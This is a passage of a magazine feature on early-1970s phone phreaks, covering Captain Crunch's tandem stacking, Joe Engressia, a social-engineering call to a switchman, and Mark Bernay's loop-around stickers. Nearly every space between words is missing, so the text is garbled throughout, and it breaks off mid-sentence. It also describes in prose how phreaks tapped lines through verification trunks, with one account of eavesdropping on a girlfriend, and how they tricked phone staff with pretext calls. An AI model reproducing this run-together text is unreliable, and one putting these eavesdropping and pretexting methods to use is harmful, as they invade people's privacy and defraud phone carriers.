remote."That'sfourtandemsstackedup.Doyouknowwhatthatmeans?Thatmeans I'mwhippingbackandforth,backandforthtwice,acrossthecountry,before comingtoyou.I'vebeenknowntostackuptwentytandemsatatime.Now,just likeIsaid,I'mgoingtoshootuptoMoscow." Thereisanew,longerseriesofbeeperpulsesovertheline,abriefsilence, thenaring. "Hello,"answersafaroffvoice. "Hello.IsthistheAmericanEmbassyMoscow?" "Yes,sir.Whoisthiscalling?"saysthevoice. "Yes.ThisistestboardhereinNewYork.We'recallingtocheckoutthe circuits,seewhatkindoflinesyou'vegot.EverythingokaythereinMoscow?" "Okay?"

"Well,yes,howarethingsthere?" "Oh.Well,everythingokay,Iguess." "Okay.Thankyou." Theyhangup,leavingaconfusedseriesofbeepkachinksoundshanginginmid etherinthewakeofthecallbeforedissolvingaway. TheCaptainispleased."Youbelievemenow,don'tyou?DoyouknowwhatI'd liketodo?I'djustliketocallupyoureditoratEsquireandshowhimjust whatitsoundsliketostackandunstacktandems.I'llgivehimashowthatwill blowhismind.What'shisnumber? IasktheCaptainwhatkindofdevicehewasusingtoaccomplishallhisfeats. TheCaptainispleasedatthequestion. "Youcouldtellitwasspecial,couldn'tyou?"Tenpulsespersecond.That's fasterthanthephonecompany'sequipment.Believeme,thisunitisthemost famousunitinthecountry.Thereisnootherunitlikeit.Believeme." "Yes,I'veheardaboutit.Someotherphonephreakshavetoldmeaboutit." "Theyhavebeenreferringtomy,ahem,unit?Whatisittheysaid?Justoutof curiosity,didtheytellyouitwasahighlysophisticatedcomputeroperated unit,withacousticalcouplingforreceivingoutputsandaswitchboardwith multiplelinetiecapability?Didtheytellyouthatthefrequencytoleranceis guaranteedtobenotmorethan.05percent?Theamplitudetolerancelessthan .01decibel?Thosepulsesyouheardwereperfect.Theyjustcomefasterthanthe phonecompany.Thosewerehighprecisionopamps.Opampsareinstrumentation amplifiersdesignedforultrastableamplification,superlowdistortionand accuratefrequencyresponse.Didtheytellyouitcanoperateintemperatures from55Cto+125C?" Iadmitthattheydidnottellmeallthat. "Ibuiltitmyself,"theCaptaingoeson."Ifyouweretogooutandbuythe componentsfromanindustrialwholesaleritwouldcostyouatleast$1500.I onceworkedforasemiconductorcompanyandallthisdidn'tcostmeacent.Do youknowwhatImean?DidtheytellyouabouthowIputacallcompletelyaround theworld?I'lltellyouhowIdidit.IMFedTokyoinward,whoconnectedmeto India,IndiaconnectedmetoGreece,GreececonnectedmetoPretoria,South Africa,SouthAfricaconnectedmetoSouthAmerica,IwentfromSouthAmericato London,IhadaLondonoperatorconnectmetoaNewYorkoperator,IhadNew YorkconnectmetoaCaliforniaoperatorwhorangthephonenexttome.Needless tosayIhadtoshouttohearmyself.Buttheechowasfarout.Fantastic. Delayed.Itwasdelayedtwentyseconds,butIcouldhearmyselftalktomyself." "Youmeanyouwerespeakingintothemouthpieceofonephonesendingyourvoice aroundtheworldintoyourearthroughaphoneontheothersideofyourhead?" IaskedtheCaptain.Ihadavisionofsomethingvaguelyautoeroticgoingon,in acomplexelectronicway. "That'sright,"saidtheCaptain."I'vealsosentmyvoicearoundtheworldone way,goingeastononephone,andgoingwestontheother,goingthroughcable oneway,satellitetheother,comingbacktogetheratthesametime,ringingthe twophonessimultaneouslyandpickingthemupandwhippingmyvoicebothways aroundtheworldbacktome.Wow.Thatwasamindblower.""Youmeanyousit therewithbothphonesonyourearandtalktoyourselfaroundtheworld,"I saidincredulously.

"Yeah.Umhum.That'swhatIdo.Iconnectthephonetogetherandsitthereand talk." "Whatdoyousay?Whatdoyousaytoyourselfwhenyou'reconnected?" "Oh,youknow.Hellotestonetwothree,"hesaysinalowpitchedvoice. "Hellotestonetwothree,"herepliedtohimselfinahighpitchedvoice. "Hellotestonetwothree,"herepeatsagain,lowpitched. "Hellotestonetwothree,"hereplies,highpitched. "Isometimesdothis:HelloHelloHelloHello,Hello,hello,"hetrailsoffand breaksintolaughter. WhyCaptainCrunchHardlyEverTapsPhonesAnymore Usinginternalphonecompanycodes,phonephreakshavelearnedasimplemethod fortappingphones.Phonecompanyoperatorshaveinfrontofthemaboardthat holdsverificationjacks.Itallowsthemtoplugintoconversationsincaseof emergency,tolistenintoalinetodetermineifthelineisbusyorthe circuitsarebusy.Phonephreakshavelearnedtobeepoutthecodeswhichlead themtoaverificationoperator,telltheverificationoperatortheyare switchmenfromsomeotherareacodetestingoutverificationtrunks.Oncethe operatorhooksthemintotheverificationtrunk,theydisappearintotheboard forallpracticalpurposes,slipunnoticedintoanyoneofthe10,000to100,000 numbersinthatcentralofficewithouttheverificationoperatorknowingwhat they'redoing,andofcoursewithoutthetwopartiestotheconnectionknowing thereisaphantomlistenerpresentontheirline. Towardtheendofmyhourlongfirstconversationwithhim,IaskedtheCaptain ifheevertappedphones. "Ohno.Idon'tdothat.Idon'tthinkit'sright,"hetoldmefirmly."Ihave thepowertodoitbutIdon't...Wellonetime,justonetime,Ihavetoadmit thatIdid.Therewasthisgirl,Linda,andIwantedtofindout...youknow.I triedtocallherupforadate.IhadadatewithherthelastweekendandI thoughtshelikedme.Icalledherup,man,andherlinewasbusy,andIkept callinganditwasstillbusy.Well,Ihadjustlearnedaboutthissystemof jumpingintolinesandIsaidtomyself,'Hmmm.Whynotjustseeifitworks. It'llsurpriseherifallofasuddenIshouldpopuponherline.It'llimpress her,ifanything.'SoIwentaheadanddidit.IMFedintotheline.MyMFer ispowerfulenoughwhenpatcheddirectlyintothemouthpiecetotriggera verificationtrunkwithoutusinganoperatorthewaytheotherphonephreaks haveto. "Islippedintothelineandthereshewastalkingtoanotherboyfriend.Making sweettalktohim.Ididn'tmakeasoundbecauseIwassodisgusted.SoIwaited thereforhertohangup,listeningtohermakingsweettalktotheotherguy. Youknow.SoassoonasshehungupIinstantlyMFedherupandallIsaid was,'Linda,we'rethrough.'AndIhungup.Anditblewherheadoff.She couldn'tfigureoutwhatthehellhappened. "Butthatwastheonlytime.IdiditthinkingIwouldsurpriseher,impress her.Thosewereallmyintentionswere,andwell,itreallykindofhurtme prettybadly,and...andeversincethenIdon'tgointoverificationtrunks." MomentslatermyfirstconversationwiththeCaptaincomestoaclose. "Listen,"hesays,hisspiritssomewhatcheered,"listen.Whatyouaregoingto hearwhenIhangupisthesoundoftandemsunstacking.Layerafterlayerof

tandemsunstackinguntilthere'snothingleftofthestack,untilitmeltsaway intonothing.Cheep,cheep,cheep,cheep,"heconcludes,hisvoicedescendingto awhisperwitheachcheep. Hehangsup.Thephonesuddenlygoesintofourspasms:kachinkcheep.Kachink cheepkachinkcheepkachinkcheep,andthecomplexconnectionhaswipeditself outliketheCheshirecat'ssmile. TheMFBoogieBlues ThenextnumberIchoosefromtheselectlistofphonephreakalumni,prepared formebytheblueboxinventor,isaMemphisnumber.ItisthenumberofJoe Engressia,thefirstandstillperhapsthemostaccomplishedblindphonephreak. ThreeyearsagoEngressiawasaninedaywonderinnewspapersandmagazinesall overAmericabecausehehadbeendiscoveredwhistlingfreelongdistance connectionsforfellowstudentsattheUniversityofSouthFlorida. Engressiawasbornwithperfectpitch:hecouldwhistlephonetonesbetterthan thephonecompany'sequipment. Engressiamighthavegoneonwhistlinginthedarkforafewfriendsforthe restofhislifeifthephonecompanyhadn'tdecidedtoexposehim.Hewas warned,disciplinedbythecollege,andthewholecasebecamepublic.Inthe monthsfollowingmediareportsofhistalent,Engressiabeganreceivingstrange calls.TherewerecallsfromagroupofkidsinLosAngeleswhocoulddosome verystrangethingswiththequirkyGeneralTelephoneandElectronicscircuitry inLAsuburbs.Therewerecallsfromagroupofmostlyblindkidsin, California,whohadbeendoingsomeinterestingexperimentswithCap'nCrunch whistlesandtestloops.TherewasagroupinSeattle,agroupinCambridge, Massachusetts,afewfromNewYork,afewscatteredacrossthecountry.Someof themhadalreadyequippedthemselveswithcassetteandelectronicMFdevices. Forsomeofthesegroups,itwasthefirsttimetheyknewoftheothers. TheexposureofEngressiawasthecatalystthatlinkedtheseparatephonephreak centerstogether.TheyallcalledEngressia.Theytalkedtohimaboutwhathe wasdoingandwhattheyweredoing.Andthenhetoldthemthescattered regionalcentersandlonelyindependentphonephreakersabouteachother, gavethemeachother'snumberstocall,andwithinayearthescatteredphone phreakcentershadgrownintoanationwideunderground. JoeEngressiaisonlytwentytwoyearsoldnow,butalongthephonephreak networkheis"theoldman,"accordedbyphonephreakssomethingofthe reverencethephonecompanybestowsonAlexanderGrahamBell.Heseldomneedsto makecallsanymore.Thephonephreaksallcallhimandlethimknowwhatnew tricks,newcodes,newtechniquestheyhavelearned.Everynighthesitslikea sightlessspiderinhislittleapartmentreceivingmessagesfromeverytendril ofhisweb.ItisalmostapointofpridewithJoethattheycallhim. ButwhenIreachedhiminhisMemphisapartmentthatnight,JoeEngressiawas lonely,jumpyandupset. "God,I'mgladsomebodycalled.Idon'tknowwhytonightofallnightsIdon't getanycalls.Thisguyaroundheregotdrunkagaintonightandpropositionedme again.Ikeeptellinghimwe'llneverseeeyetoeyeonthissubject,ifyou knowwhatImean.Itrytomakelightofit,youknow,buthedoesn'tgetit.I canheadhimouttheregettingdrunkerandIdon'tknowwhathe'lldonext.It's justthatI'mreallyallalonehere,justmovedtoMemphis,it'sthefirsttime I'mlivingonmyown,andI'dhateforittoallcollapsenow.ButIwon'tgoto bedwithhim.I'mjustnotveryinterestedinsexandevenifIcan'tseehimI knowhe'sugly.

"Didyouhearthat?That'shimbangingabottleagainstthewalloutside.He's nice.Wellforgetaboutit.You'redoingastoryonphonephreaks?Listento this.It'stheMFBoogieBlues. Sureenough,ajumpyversionofMuskratRambleboogiesitswayovertheline, eachnoteoneofthoselongdistancephonetones.Themusicstops.Ahuge roaringvoiceblaststhephoneoffmyear:"ANDTHEQUESTIONIS..."roarsthe voice,"CANABLINDPERSONHOOKUPANAMPLIFIERONHISOWN?" Theroarceases.Ahighpitchedoperatortypevoicereplacesit."Thisis SouthernBrailleTel.&Tel.Havetone,willphone." ThisissucceededbyaquickseriesofMFtones,aswift"kachink"andadeep reassuringvoice:"Ifyouneedhomecare,callthevisitingnursesassociation. FirstNationaltimeinHonoluluis4:32p.m." JoebackinhisJoevoiceagain:"Areweseeingeyetoeye?'Si,si,'saidthe blindMexican.Ahem.Yes.WouldyouliketoknowtheweatherinTokyo?" Thisswiftmanicsequenceofphonephreakvaudevillestuntsandblindboyjokes managestokeepJoe'smindoffhistormentoronlyaslongasitlasts. "ThereasonI'minMemphis,thereasonIhavetodependonthathomosexualguy, isthatthisisthefirsttimeI'vebeenabletoliveonmyownandmakephone tripsonmyown.I'vebeenbannedfromallcentralofficesaroundhomein Florida,theyknewmetoowell,andattheUniversitysomeofmyfellowscholars werealwaysharassingmebecauseIwasonthedormpayphoneallthetimeand makingfunofmebecauseofmyfatass,whichofcourseIdohave,it'smy physicalfatnessprogram,butIdon'tliketoheariteveryday,andifIcan't phonetripandIcan'tphonephreak,Ican'timaginewhatI'ddo,I'vebeen devotingthreequartersofmylifetoit. "ImovedtoMemphisbecauseIwantedtobeonmyownaswellasbecauseithasa Number5crossbarswitchingsystemandsomeinterestinglittleindependent phonecompanydistrictsnearbyandsofartheydon'tseemtoknowwhoIamsoI cangoonphonetripping,andformephonetrippingisjustasimportantas phonephreaking." Phonetripping,Joeexplains,beginswithcallingupacentralofficeswitch room.Hetellstheswitchmaninapoliteearnestvoicethathe'sablindcollege studentinterestedintelephones,andcouldheperhapshaveaguidedtourofthe switchingstation?EachstepofthetourJoelikestotouchandfeelrelays, caressswitchingcircuits,switchboards,crossbararrangements. SowhenJoeEngressiaphonephreakshefeelshiswaythroughthecircuitryof thecountrygardenofforkingpaths,hefeelsswitchesshift,relaysshunt, crossbarsswivel,tandemsengageanddisengageevenashehearswithperfect pitchhisMFpulsesmaketheentireBellsystemdancetohistune. JustonemonthagoJoetookallhissavingsoutofhisbankandlefthome,over theemotionalprotestsofhismother."Iranawayfromhomealmost,"helikesto say.JoefoundasmallapartmenthouseonUnionAvenueandbeganmakingphone trips.He'dtakeabusahundredmilessouthinMississippitoseesomeold fashionedBellequipmentstillinuseinseveralstates,whichhadbeen puzzling.He'dtakeabusthreehundredmilestoCharlotte,NorthCarolina,to lookatsomebrandnewexperimentalequipment.Hehiredataxitodrivehim twelvemilestoasuburbtotourtheofficeofasmallphonecompanywithsome interestingidiosyncrasiesinitsroutingsystem.Hewashavingthetimeofhis life,hesaid,themostfreedomandpleasurehehadknown. Inthatmonthhehaddoneverylittlelongdistancephonephreakingfromhisown phone.Hehadbeguntoapplyforajobwiththephonecompany,hetoldme,and

hewantedtostayawayfromanythingillegal. "Anykindofjobwilldo,anythingasmenialasthemostlowlyoperator.That's probablyallthey'dgivemebecauseI'mblind.EventhoughIprobablyknowmore thanmostswitchmen.Butthat'sokay.IwanttoworkforMaBell.Idon'thate MaBellthewayGilbertsonandsomephonephreaksdo.Idon'twanttoscrewMa Bell.Withmeit'sthepleasureofpureknowledge.There'ssomethingbeautiful aboutthesystemwhenyouknowitintimatelythewayIdo.ButIdon'tknowhow muchtheyknowaboutmehere.Ihaveaveryintuitivefeelfortheconditionof thelineI'mon,andIthinkthey'remonitoringmeoffandonlately,butI haven'tbeendoingmuchillegal.Ihavetomakeafewcallstoswitchmenoncein awhilewhicharen'tstrictlylegal,andonceItookanacidtripandwashaving theseauditoryhallucinationsasifIweretrappedandtheseplanesweredive bombingme,andallofsuddenIhadtophonephreakoutofthere.Forsome reasonIhadtocallKansasCity,butthat'sall." AWarningIsDelivered Atthispointoneo'clockinmytimezonealoudknockonmymotelroom doorinterruptsourconversation.OutsidethedoorIfindauniformedsecurity guardwhoinformsmethattherehasbeenan"emergencyphonecall"formewhile Ihavebeenonthelineandthatthefrontdeskhassenthimuptoletmeknow. TwosecondsafterIsaygoodbyetoJoeandhangup,thephonerings. "Whowereyoutalkingto?"theagitatedvoicedemands.Thevoicebelongsto CaptainCrunch."IcalledbecauseIdecidedtowarnyouofsomething.Idecided towarnyoutobecareful.Idon'twantthisinformationyougettogettothe radicalunderground.Idon'twantittogetintothewronghands.Whatwouldyou sayifItoldyouit'spossibleforthreephonephreakstosaturatethephone systemofthenation.Saturateit.Busyitout.Allofit.Iknowhowtodo this.I'mnotgonnatell.Afriendofminehasalreadysaturatedthetrunks betweenSeattleandNewYork.HediditwithacomputerizedMFerhitchedinto aspecialManitobaexchange.Butthereareother,easierwaystodoit." Justthreepeople?Iask.Howisthatpossible? "Haveyoueverheardofthelonglinesguardfrequency?Doyouknowabout stackingtandemswith17and2600?Well,I'dadviseyoutofindoutaboutit. I'mnotgonnatellyou.Butwhateveryoudo,don'tletthisgetintothehands oftheradicalunderground." (LaterGilbertson,theinventor,confessedthatwhilehehadalwaysbeen skepticalabouttheCaptain'sclaimofthesabotagepotentialoftrunktying phonephreaks,hehadrecentlyheardcertaindemonstrationswhichconvincedhim theCaptainwasnotspeakingidly."Ithinkitmighttakemorethanthree people,dependingonhowmanymachineslikeCaptainCrunch'swereavailable.But eventhoughtheCaptainsoundsalittleweird,hegenerallyturnsouttoknow whathe'stalkingabout.") "Youknow,"CaptainCrunchcontinuesinhisadmonitorytone,"youknowthe youngerphonephreakscallMoscowallthetime.Supposeeverybodyweretocall Moscow.I'mnorightwinger.ButIvaluemylife.Idon'twanttheCommies comingoveranddroppingabombonmyhead.That'swhyIsayyou'vegottobe carefulaboutwhogetsthisinformation." TheCaptainsuddenlyshiftsintoadiatribeagainstthosephonephreakswho don'tlikethephonecompany. "Theydon'tunderstand,butMaBellknowseverythingtheydo.MaBellknows. Listen,isthislinehot?Ijustheardsomeonetapin.I'mnotparanoid,butI candetectthingslikethat.Well,evenifitis,theyknowthatIknowthat

theyknowthatIhaveabulkeraser.I'mveryclean."TheCaptainpauses, evidentlytornbetweenwantingtoprovetothephonecompanymonitorsthathe doesnothingillegal,andthedesiretoimpressMaBellwithhisprowess."Ma BellknowshowgoodIam.AndIamquitegood.Icandetectreversals,tandem switching,everythingthatgoesonaline.Ihaverelativepitchnow.Doyou knowwhatthatmeans?Myearsarea$20,000pieceofequipment.WithmyearsI candetectthingstheycan'thearwiththeirequipment.I'vehademployment problems.I'velostjobs.ButIwanttoshowMaBellhowgoodIam.Idon'twant toscrewher,Iwanttoworkforher.Iwanttodogoodforher.Iwanttohelp hergetridofherflawsandbecomeperfect.That'smynumberonegoalinlife now."TheCaptainconcludeshiswarningsandtellsmehehastobegoing."I've gotalittleactionlinedupfortonight,"heexplainsandhangsup. BeforeIhangupforthenight,IcallJoeEngressiaback.Hereportsthathis tormentorhasfinallygonetosleep"He'snotblinddrunk,that'sthewayI get,ahem,yes;butyoumightsayhe'sinadrunkenstupor."Imakeadateto visitJoeinMemphisintwodays. APhonePhreakCallTakesCareofBusiness ThenextmorningIattendagatheringoffourphonephreaksin(a Californiasuburb).Thegatheringtakesplaceinacomfortablesplitlevelhome inanuppermiddleclasssubdivision.Heapedonthekitchentablearethe portablecassetterecorders,MFcassettes,phonepatches,andlinetiesofthe fourphonephreakspresent.Onthekitchencounternexttothetelephoneisa shoeboxsizeblueboxwiththirteenlargetoggleswitchesforthetones.The parentsofthehostphonephreak,Ralph,whoisblind,stayinthelivingroom withtheirsightedchildren.TheyarenotsureexactlywhatRalphandhis friendsdowiththephoneorifit'sstrictlylegal,butheisblindandthey arepleasedhehasahobbywhichkeepshimbusy. Thegrouphasbeenworkingatreestablishingthehistoric"2111"conference, reopeningsometollfreeloops,andtryingtodiscoverthedimensionsofwhat seemtobenewinitiativesagainstphonephreaksbyphonecompanysecurity agents. ItisnotlongbeforeIgetachancetosee,tohear,Randyatwork.Randyis knownamongthephonephreaksasperhapsthefinestconmaninthegame.Randy isblind.Heispale,softandpearshaped,hewearsbaggypantsandawrinkly nylonwhitesportshirt,pusheshisheadforwardfromhunchedshoulderssomewhat likeaturtleinchingoutofitsshell.Hiseyeswander,crossingand recrossing,andhisforeheadissomewhatpimply.Heisonlysixteenyearsold. ButwhenRandystartsspeakingintoatelephonemouthpiecehisvoicebecomesso stunninglyauthoritativeitisnecessarytolookagaintoconvinceyourselfit comesfromachubbyadolescentRandy.Imaginethevoiceofacrackoilrig foreman,atough,sharp,weatherbeatenMarlboromanofforty.Imaginethevoice ofabrilliantperformancefundgunslingerexplaininghowhebeatstheDowJones bythirtypercent.Thenimagineavoicethatcouldmakethosetwosoundlike StepinFetchit.ThatissixteenyearoldRandy'svoice. HeisspeakingtoaswitchmaninDetroit.ThephonecompanyinDetroithad closeduptwotollfreelooppairsfornoapparentreason,althoughheavyuseby phonephreaksalloverthecountrymayhavebeendetected.Randyistellingthe switchmanhowtoopenuptheloopandmakeitfreeagain: "Howareyou,buddy.Yeah.I'montheboardinhereinTulsa,Oklahoma,and we'vebeentryingtorunsometestsonyourlooparoundsandwefind'embusied outonbothsides....Yeah,we'vebeengettinga'BY'onthem,whatd'yasay, canyoudropcardson'em?Doyouhave08onyournumbergroup?Ohthat'sokay, we'vehadthistroublebefore,wemayhavetogoafterthecircuit.Herelemme give'emtoyou:yourframeis05,verticalgroup03,horizontal5,vertical

file3.Yeah,we'llhangonhere....Okay,foundit?Good.Right,yeah,we'd liketoclearthatbusyout.Right.Allyouhavetodoislookforyourkeyon themountingplate,it'sinyourmiscellaneoustrunkframe.Okay?Right.Now pullyourkeyfromNORovertheLCT.Yeah.Idon'tknowwhythathappened,but we'vebeenhavingtroublewiththatone.Okay.Thanksalotfella.Beseein' ya." Randyhangsup,reportsthattheswitchmanwasalittleinexperiencedwiththe looparoundcircuitsonthemiscellaneoustrunkframe,butthattheloophas beenreturnedtoitsfreecallstatus. Delighted,phonephreakEdreturnsthepairofnumberstotheactivestatus columninhisdirectory.Edisasuperbandpainstakingresearcher.Withalmost Talmudicthoroughnesshewilltracetendrilsofhintsthroughsoftwiredmazes ofinterveningphonecompanycircuitrybackthroughcomplexlinkagesof switchingrelaystofindthelocationandidentityofjustonetollfreeloop. Hespendshoursandhours,everyday,doingthissortofthing.Hehassomehow compiledadirectoryofeighthundred"BandsixinWATSnumbers"locatedinover fortystates.BandsixinWATSnumbersarethebig800numberstheonesthat canbedialedintofreefromanywhereinthecountry. Edtheresearcher,anineteenyearoldengineeringstudent,isalsoasuperb technician.Heputtogetherhisownworkingblueboxfromscratchatage seventeen.(Heissighted.)Thiseveningafterdistributingthelatestissueof hisinWATSdirectory(whichhasbeentypedintoBraillefortheblindphone phreaks),heannounceshehasmadeamajornewbreakthrough: "Ifinallytesteditanditworks,perfectly.I'vegotthisswitchingmatrix whichconvertsanytouchtonephoneintoanMFer." ThetonesyouhearintouchtonephonesarenottheMFtonesthatoperatethe longdistanceswitchingsystem.PhonephreaksbelieveAT&T.haddeliberately equippedtouchtoneswithadifferentsetoffrequenciestoavoidputtingthe sixmasterMFtonesinthehandsofeverytouchtoneowner.Ed'scomplex switchingmatrixputsthesixmastertones,ineffectputabluebox,inthe handsofeverytouchtoneowner. Edshowsmepagesofschematics,specificationsandpartslists."It'snoteasy tobuild,buteverythinghereisintheHeathkitcatalog." EdasksRalphwhatprogresshehasmadeinhisattemptstoreestablishalong termopenconferencelineforphonephreaks.Thelastbigconferencethe historic"2111"conferencehadbeenarrangedthroughanunusedTelextest boardtrunksomewhereintheinnardsofa4AswitchingmachineinVancouver, Canada.FormonthsphonephreakscouldMFtheirwayintoVancouver,beepout 604(theVancouverareacode)andthenbeepout2111(theinternalphonecompany codeforTelextesting),andfindthemselvesatanytime,dayornight,onan openwiretalkingwithanarrayofphonephreaksfromcoasttocoast,operators fromBermuda,TokyoandLondonwhoarephonephreaksympathizers,and miscellaneousguestsandtechnicalexperts.Theconferencewasamassive exchangeofinformation.Phonephreakspickedeachother'sbrainsclean,then developednewwaystopickthephonecompany'sbrainsclean.RalphgaveMF Boogiesconcertswithhishomeentertainmenttypeelectricorgan,CaptainCrunch demonstratedhisroundtheworldprowesswithhisnotoriouscomputerizedunit anddroppedleeringhintsofthe"action"hewasgettingwithhisgirlfriends. (TheCaptainlivesoutorpretendstoliveoutseveralkindsoffantasiestothe gossipydelightoftheblindphonephreakswhourgehimontofurthertriumphs onbehalfofallofthem.)ThesomewhatrowdyNorthwestphonephreakcrowdlet theirbitterinternalfeudspilloverintothepeaceableconferenceline, escalatingshortlyintoguerrillawarfare;CarltheEastCoastinternational tonerelationsexpertdemonstratednewlyopeneddirectMFroutestocentral officesontheislandofBahreininthePersianGulf,introducedanewphone

phreakfriendofhisinPretoria,andexplainedthetechnicaloperationofthe newOaklandtoVietnamlinkages.(Manyphonephreakspickupspendingmoneyby MFingcallsfromrelativestoVietnamGIscharging$5forawholehourof transPacificconversation.) Dayandnighttheconferencelinewasneverdead.Blindphonephreaksallover thecountry,lonelyandisolatedinhomesfilledwithactivesightedbrothers andsisters,ortrappedwithslowandunimaginativeblindkidsinstraitjacket schoolsfortheblind,knewthatnomatterhowlateitgottheycoulddialup theconferenceandfindinstantelectroniccommunionwithtwoorthreeother blindkidsawakeoverontheothersideofAmerica.Talkingtogetheronaphone hookup,theblindphonephreakssay,isnotmuchdifferentfrombeingthere together.Physically,therewasnothingmorethanatwoinchsquarewaferof titaniuminsideavastmachineonVancouverIsland.Fortheblindkids>there< meantanexhilaratingfeelingofbeingintouch,throughakindofskilland magicwhichwaspeculiarlytheirown. LastApril1,however,thelongVancouverConferencewasshutoff.Thephone phreaksknewitwascoming.Vancouverwasintheprocessofconvertingfroma stepbystepsystemtoa4Amachineandthe2111Telexcircuitwastobewiped outintheprocess.Thephonephreakslearnedtheactualdayonwhichthe conferencewouldbeerasedaboutaweekaheadoftimeoverthephonecompany's internalnewsandshoptalkrecording. ForthenextfranticsevendayseveryphonephreakinAmericawasonandoffthe 2111conferencetwentyfourhoursaday.Phonephreakswhowerejustlearning thegameordidn'thaveMFcapabilitywereboosteduptotheconferencebymore experiencedphreakssotheycouldgetaglimpseofwhatitwaslikebeforeit disappeared.Topphonephreakssearcheddistantareacodesfornewconference possibilitieswithoutsuccess.FinallyintheearlymorningofApril1,theend came. "Icouldfeelitcomingacouplehoursbeforemidnight,"Ralphremembers."You couldfeelsomethinggoingoninthelines.Somestaticbeganshowingup,then somewhistlingwheezingsound.Thentherewerebreaks.Somepeoplegotcutoff andcalledrightbackin,butafterawhilesomepeoplewerefindingtheywere cutoffandcouldn'tgetbackinatall.Itwasterrible.Ilostitaboutone a.m.,butmanagedtoslipinagainandstayonuntilthethingdied...Ithink itwasaboutfourinthemorning.Therewerefourofusstillhangingonwhen theconferencedisappearedintonowhereforgood.WealltriedtoMFuptoit againofcourse,butwegotsilenttermination.Therewasnothingthere." TheLegendaryMarkBernayTurnsOutToBe"TheMidnightSkulker" MarkBernay.Ihadcomeacrossthatnamebefore.ItwasonGilbertson'sselect listofphonephreaks.TheCaliforniaphonephreakshadspokenofamysterious MarkBernayasperhapsthefirstandoldestphonephreakontheWestCoast.And infactalmosteveryphonephreakintheWestcantracehisoriginseither directlytoMarkBernayortoadiscipleofMarkBernay. ItseemsthatfiveyearsagothisMarkBernay(apseudonymhechoseforhimself) begantravelingupanddowntheWestCoastpastingtinystickersinphonebooks allalonghisway.Thestickersreadsomethinglike"Wanttohearaninteresting taperecording?Callthesenumbers."Thenumbersthatfollowedweretollfree looparoundpairs.Whenoneofthecuriouscalledoneofthenumbershewould hearataperecordingprehookedintotheloopbyBernaywhichexplainedtheuse oflooparoundpairs,gavethenumbersofseveralmore,andendedbytellingthe caller,"Atsixo'clocktonightthisrecordingwillstopandyouandyour friendscantryitout.Havefun." "Iwasdisappointedbytheresponseatfirst,"Bernaytoldme,whenIfinally reachedhimatoneofhismanynumbersandhehaddispensedwiththeusual"I

neverdoanythingillegal"formalitieswhichexperiencedphonephreaksopenmost conversations. "Iwentalloverthecoastwiththesestickersnotonlyonpayphones,butI'd throwtheminfrontofhighschoolsinthemiddleofthenight,I'dleavethem unobtrusivelyincandystores,scatterthemonmainstreetsofsmalltowns.At firsthardlyanyonebotheredtotryitout.Iwouldlisteninforhoursand hoursaftersixo'clockandnoonecameon.Icouldn'tfigureoutwhypeople wouldn'tbeinterested.FinallythesetwogirlsinOregontrieditoutandtold alltheirfriendsandsuddenlyitbegantospread." BeforehisJohnyAppleseedtripBernayhadalreadygatheredasizablegroupof earlypreblueboxphonephreakstogetheronlooparoundsinLosAngeles.Bernay doesnotclaimcreditfortheoriginaldiscoveryofthelooparoundnumbers.He attributesthediscoverytoaneighteenyearoldreformschoolkidinLongBeach whosenameheforgetsandwho,hesays,"justdisappearedoneday."WhenBernay himselfdiscoveredlooparoundsindependently,fromcluesinhisreadingsinold issuesoftheAutomaticElectricTechnicalJournal,hefounddozensofthe reformschoolkid'sfriendsalreadyusingthem.However,itwasoneofBernay's disciplesinSeattlethatintroducedphonephreakingtoblindkids.TheSeattle kidwholearnedaboutloopsthroughBernay'srecordingtoldablindfriend,the blindkidtaughtthesecrettohisfriendsatawintercampforblindkidsin LosAngeles.Whenthecampsessionwasoverthesekidstookthesecretbackto townsallovertheWest.Thisishowtheoriginalblindkidsbecamephone phreaks.Forthem,formostphonephreaksingeneral,itwasthediscoveryof thepossibilitiesoflooparoundswhichledthemontofarmoreseriousand sophisticatedphonephreakmethods,andwhichgavethemamediumforsharing theirdiscoveries. Ayearlaterablindkidwhomovedbackeastbroughtthetechniquetoablind kids'summercampinVermont,whichspreaditalongtheEastCoast.Allfroma MarkBernaysticker. Bernay,whoisnearlythirtyyearsoldnow,gothisstartwhenhewasfifteen andhisfamilymovedintoanL.A.suburbservicedbyGeneralTelephoneand Electronicsequipment.HebecamefascinatedwiththedifferencesbetweenBell andG.T.&E.equipment.Helearnedhecouldmakeinterestingthingshappenby carefullytimedclickswiththedisengagebutton.Helearnedtointerpretsubtle differencesinthearrayofclicks,whirrsandkachinkshecouldhearonhis lines.HelearnedhecouldshifthimselfaroundtheswitchingrelaysoftheL.A. areacodeinanottoopredictablefashionbyinterspersinghisownhookswitch clickswiththeclickswithintheline.(Independentphonecompaniesthere arenineteenhundredofthemstillleft,mostofthemtinyislandprincipalities inMaBell'svastempirehavealwaysbeenfavoriteswithphonephreaks,first aslearningtools,thenasArchimedesplatformsfromwhichtomanipulatethe hugeBellsystem.AphonephreakinBellterritorywilloftenMFhimselfinto anindependent'sswitchingsystem,withswitchingidiosyncrasieswhichcangive himmarvelousleverageovertheBellSystem. "IhavearealaffectionforAutomaticElectricEquipment,"Bernaytoldme. "Therearealotofthingsyoucanplaywith.Thingsbreakdownininteresting ways." ShortlyafterBernaygraduatedfromcollege(withadoublemajorinchemistry andphilosophy),hegraduatedfromphreakingaroundwithG.T.&E.totheBell Systemitself,andmadehislegendarystickerpastingjourneynorthalongthe coast,settlingfinallyinNorthwestPacificBellterritory.Hediscoveredthat ifBelldoesnotbreakdownasinterestinglyasG.T.&E.,itneverthelessoffers alotof"thingstoplaywith." Bernaylearnedtoplaywithblueboxes.Heestablishedhisownpersonal switchboardandphonephreakresearchlaboratorycomplex.Hecontinuedhis

